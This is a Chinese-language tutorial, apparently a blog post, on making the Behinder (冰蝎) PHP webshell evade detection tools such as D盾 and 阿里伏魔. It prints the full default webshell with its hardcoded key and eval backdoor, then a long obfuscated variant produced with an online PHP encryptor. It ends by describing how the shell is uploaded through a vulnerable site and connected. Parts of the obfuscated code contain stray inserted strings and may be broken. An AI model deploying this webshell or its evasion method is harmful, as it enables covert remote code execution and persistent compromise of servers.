冰蝎Webshell的免杀实战

	写在前面 本次测试仅供学习使用，如若非法他用，与平台和作者无关，需自行负责！ 背景介绍 随着网络攻防对抗的愈演愈烈，”查杀“与“免杀”作为对抗最基本的场景。同时webshell作为攻击者突 破网络边界的关键武器，不论是攻击者的绕过检测还防守者的检测都已经成为兵家必争之器。 具体操作 以下是冰蝎默认php环境下的webshell文件 <?php @error_reporting(0) session_start(); $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond $SESSION['k']=$key;session_write_close();$post=file_get_contents("php://input");if (!extension_loaded('openssl')){$t="base64"."decode"; $post=$t($post.""); for($i=0;$i<strlen($post);$i++) { $post[$i] = $post[$i]^$key[$i+1&15]; } } else { $post=openssl_decrypt($post, "AES128", $key); } $arr=explode('|',$post); $func=$arr[0]; $params=$arr[1]; class C{public function __invoke($p) {eval($p."");}} @call_user_func(new C(),$params); ?> 通过webshell 查杀工具进行检测，结果如下： D盾检测（可检测） 冰河检测（可检测） 阿里伏魔（可检测） 免杀处理 通过使用常见的方式进行免杀处理，一般对于安全狗杀形，d盾杀参的思路来绕过。生僻的回调函数 特殊的加密方式,以及关键词的后传入都是可以的。 下面通过对php马进行混淆参数、加密等方式进行免杀处理。 https://enphp.djunny.com/ 1.将冰蝎默认的webshell上传到平台。 2.选择混淆的参数，这里全选 3.点击加密，生成免杀后的webshell（每次生成都不一样，有时会解析出问题） 接下来进行免杀测试 D盾检测（可疑） 冰河检测（免杀） 阿里伏魔检测（风险） 这里是免杀马内容，感觉乱七八糟的 <?php goto ½ÎÃÏ;¨êãâ:function ˆšî(){goto Ö“Âý;íÒÈÛ:return((parse_str("®íñš=Y2FsbF91c2VyX2Z1bmM",$õþõ±)||$õþõ±)?base64_decode($õþõ±['®íñš']):"");goto ñæ¦ì;ñæ¦ì:±íúÂ:goto ô«—˜;ó®æ¢:$Š³ñ‘=0x00026a9;goto ŠÓ’õ;ŠÓ’õ:if(!($„“ý[0]==$Š³ñ‘+0x0024))goto ±íúÂ;goto íÒÈÛ;Ö“Âý:$„“ý=func_get_args();goto ó®æ¢;ô«—˜:}goto ßÑ;Ͳ”°:goto ÔŸ¶õ;goto ÅØ»ô;»Œ¶Ô:class C{public function __invoke($´€¼À){eval($´€¼À.base64_decode(str_rot13('')));}}goto ¹Ôœ·;ž–™:ÔŸ¶õ:goto °ËüÉ;ÅØ»ô:ݲ÷:goto ™µý¼;Û®ˆ:$Ö€Ï=˜ò(0x000d95,0x00da8,0x0000d73)(˜ò(0x00df3,0x00000dce));goto ¶Á ;˺Úë:$ð謃=˜ò(0x00d08,$ð謃);goto û»‰;¡ÐÈ—:$Ö€Ï=$‰óÔ($Ö€Ï.((parse_str("–õ¿×=",$¥¨ýÊ)||$¥¨ýÊ)?base64_decode($¥¨ýÊ['–õ¿×']):""));goto ³òäÝ;™µý¼:ûãýË:goto 擇;ßÑ:function ÃŒûƒ(){goto Òé¿€;ÁŒíÇ:return((parse_str("c3RybGVu",$Ãò²¶)||$Ãò²¶)?base64_decode(key($Ãò²¶)):"");goto ãáÚ;÷㵸:ÍØËÎ:goto Ýžº¤;‘´¿Â:if(!($¯‡¬Æ[0x0002]==$©¢Ì+0x00061))goto µž×ì;goto á;ÆÙâã:$©¢Ì=0x0240e;goto ÖÚï½;ðÁ¯¬:µž×ì:goto ¯ÎÒ×;á:return(base64_decode('b3BlbnNzbF9kZWNyeXB0')?:$טգ);goto ðÁ¯¬;¬¹•Ž:if(!($¯‡¬Æ[0x001]==$©¢Ì+0x000013e))goto ßîÛñ;goto ——¹™;ÁÁÓì:return((parse_str("‡¡Ž=ZXhwbG9kZQ",$ÑÛÚû)||$ÑÛÚû)?base64_decode($ÑÛÚû['‡¡Ž']):"");goto ’²óŒ;ÖÚï½:if(!($¯‡¬Æ[0x001]==$©¢Ì+0x02d))goto Á㤈;goto ÁŒíÇ;øôÜÎ:return base64_decode(str_rot13('DHIGZGV4'));goto ÷㵸;——¹™:return "\x7c";goto ÍÌ–ƒ;ãáÚ:Á㤈:goto ‘´¿Â;¯ÎÒ×:if(!($¯‡¬Æ[0x001]==$©¢Ì+0x0000b7))goto ÍØËÎ;goto øôÜÎ;’²óŒ:¿Ïˆ:goto ¬¹•Ž;Òé¿€:$¯‡¬Æ=func_get_args();goto ÆÙâã;ÍÌ–ƒ:ßîÛñ:goto ݈·¦;Ýžº¤:if(!($¯‡¬Æ[0x001]==$©¢Ì+0x00000f9))goto ¿Ïˆ;goto ÁÁÓì;݈·¦:}goto ‹âãÄ;Ûžªö:@˜ò(0x000cf5)(0);goto Ñ˘;±ëéˆ:$¾¶è¼=$Œåò„[0];goto Üí©­;°ËüÉ:if(!($›•Å•<ÃŒûƒ(0x002450,0x0243b)($Ö€Ï)))goto ݲ÷;goto çÈŸÞ;çÈŸÞ:$Ö€Ï[$›•Å•]=$Ö€Ï[$›•Å•]^$ð謃[$›•Å•+0x001&0x0f];goto ©è³±;´©ú§:¸Õï:goto ·¸¶†;ÁÜÁ·:$›•Å•++;goto Ͳ”°;‹âãÄ:function ûú¥ó(){goto ȵ¢ý;ÊѼÁ:return gzinflate('K­(IÍ+ÎÌÏ‹ÏÉOLIM�');goto õÕ·å;ô Ù:return base64_decode(join("",array('Y','m','F','z','Z','T','Y','0','X','w')));goto õ¯¶›;¦¬û:if(!($äˆýÆ[0]==$¤üì˜+0x037))goto  ï’è;goto æÝ”;ÖÝŠÂ:$¤üì˜=0x00000e00;goto ¤—ïÁ;õÕ·å:îߤ”:goto ¦¬û;õ¯¶›:œ¬‹Ï:goto  ½ô¥;¶ŸÁ¹:—䧆:goto ú¨ï«;ȵ¢ý:$äˆýÆ=func_get_args();goto ÖÝŠÂ; ½ô¥:if(!($äˆýÆ[0]==$¤üì˜+0x000006d))goto —䧆;goto 둨ˆ;æÝ”:return gzinflate('Ë/HÍ+.Î�');goto ‚ ™œ;¤—ïÁ:if(!($äˆýÆ[0]==$¤üì˜+0x0015))goto îߤ”;goto ÊѼÁ;»ïÊÃ:if(!($äˆýÆ[0]==$¤üì˜+0x004c))goto œ¬‹Ï;goto ô Ù;‚ ™œ: ï’è:goto »ïÊÃ;둨ˆ:return base64_decode(join("",array('Z','G','V','j','b','2','R','l')));goto ¶ŸÁ¹;ú¨ï«:}goto „è›Ø;„„éŽ:˜ò(0x00000d51)();goto Û®ˆ;„è›Ø:function ˜ò(){goto µ¾ýö;µ¢Ü·:return base64_decode('ZTQ1ZTMyOWZlYjVkOTI1Yg');goto Š„Ä ;ßµ–Ì:Šõ‡ö:goto ™ŠÂ²;ÎÀ°Ä:return(($½šÒ·=gzinflate(substr(base64_decode('H4sI我是猪！我是猪！A0stKsovii9KLcgvKsnMSwcAF20hmA8我是猪！'),10,-8)))?$½šÒ·:$ØÒš);goto î°¥¬;¾œóœ:if(!($½“â[0x001]==$”ݸ‚+0x000049))goto ™ý¥î;goto ¾Ú˜Ô;”ÁÄ©:if(!($½“â[0x001]==$”ݸ‚+0x00100))goto ©ÂÛý;goto ‰É£Ä;âŽÕ×:if(!($½“â[0]==$”ݸ‚+0x00003a))goto ÚÈ¥ƒ;goto µ¢Ü·;妥Þ:if(!($½“â[0]==$”ݸ‚+0x0000027))goto ëß©Þ;goto ÎÀ°Ä;µ¾ýö:$”ݸ‚=0x0000cce;goto µúÓ;µúÓ:$½“â=func_get_args();goto 妥Þ;‰É£Ä:return(($«º“¥=gzinflate(substr(base64_decode('H4sI我是猪！我是猪！AyvIKLDS18/MKygtAQCnED5iCw我是猪！'),10,-8)))?$«º“¥:$Èßú);goto 陿;¢ìµ®:if(!($½“â[0]==$”ݸ‚+0x0083))goto Šõ‡ö;goto ª»Š¤;¾Ú˜Ô:return(($“‘Ûã=gzinflate(substr(base64_decode('H4sI我是猪！我是猪！A8sGAF1XYggB我是猪！'),10,-8)))?$“‘Ûã:$ÂüœÇ);goto æÀØ€;陿:©ÂÛý:goto €–¾ô;Ø­€ø:return base64_decode(join("",array('Z','m','l','s','Z','V','9','n','Z','X','R','f','Y','2','9','u','d','G','V','u','d','H','M')));goto Íœ–Ä;æÀØ€:™ý¥î:goto ¢ìµ®;Š„Ä :ÚÈ¥ƒ:goto ¾œóœ;ª»Š¤:return((parse_str("c2Vzc2lvbl93cml0ZV9jbG9zZQ",$¥’‚É)||$¥’‚É)?base64_decode(key($¥’‚É)):"");goto ßµ–Ì;™ŠÂ²:if(!($½“â[0x0002]==$”ݸ‚+0x0a5))goto ϹàÆ;goto Ø­€ø;î°¥¬:ëß©Þ:goto âŽÕ×;Íœ–Ä:ϹàÆ:goto ”ÁÄ©;€–¾ô:}goto Ûžªö;½ÎÃÏ:error_reporting(0);goto ¨êãâ;·¸¶†:$‰óÔ=ûú¥ó(0x0e4c).ûú¥ó(0x0000e6d);goto ¡ÐÈ—;擇:$Œåò„=ÃŒûƒ(0x00000252f,0x000002507)(ÃŒûƒ(0x000257d,0x0000254c),$Ö€Ï);goto ±ëéˆ;ÉöèØ:goto ûãýË;goto ´©ú§;Üí©­:$·ø¬Ý=$Œåò„[0x001];goto »Œ¶Ô;Ñ˘:session_start();goto ˺Úë;û»‰:$_SESSION[˜ò(0x00d21,0x00d17)]=$ð謃;goto „„éŽ;³òäÝ:$›•Å•=0;goto ž–™;¶Á :if(!ûú¥ó(0x0e15)(ûú¥ó(0x00000e37)))goto ¸Õï;goto ´ŸÍš;´ŸÍš:$Ö€Ï=ÃŒûƒ(0x00249b,0x0024b4,0x000246f)($Ö€Ï,ÃŒûƒ(0x00024f6,0x000024c5),$ð謃);goto ÉöèØ;©è³±:êÓ›à:goto ÁÜÁ·;¹Ôœ·:@ˆšî(0x000026cd)(new C(),$·ø¬Ý); 复制代码 利用上传漏洞进行实战 1.通过信息收集发现目标存在漏洞，上传免杀wesbell并进行解析 2.冰蝎连接（可魔改） 连接成功 总结思考 通常基于特征的webshell查杀，如果一旦经过加密webshell是不具备任何特征的，基本上是直接通杀一般来免杀工具及 免杀程序的开发者最好还是不要公开，不然被检测是很简单的事情。就像0day漏洞一样未知威胁如果成为1day就马 上可以检测了。已知威胁最后，大家思考下面一个问题： 攻击者防守者是什么关系呢？ 然后，我们复习一下生物知识 生物与生物之间的关系有原始合作、共栖关系、寄生关系、共生关系捕食关系和竞争关系。 1、原始合作：指两种生物共居在一起，对双方都有一定程度的利益，但彼此分开后各自又都能够独立生活。 2、共栖关系：指两种共居，一方受益，另一方也无害或无大害。 3、寄生关系：指一种生物生活在另一种生物的体内或体表，并从后者摄取营养以维持生活的关系。前者称寄生物后者称宿主。 4、共生关系：共生有广义的和狭义的两种概念。狭义的是指两种共居一起彼此创造有利的生活条件较之单独生活时更 为有利更有生活力；相互依赖，相互依存，一旦分离，双方都不能正常地生活。 5、捕食关系：指一种生物以另一种生物为食的种间关系。前者谓之捕食者，后者谓被捕食者。 6、竞争关系：有种内和种间两种竞争方式。这里是指两种共居一起，为争夺有限的营养空间 和其他共同需要而发生斗争的种间关系。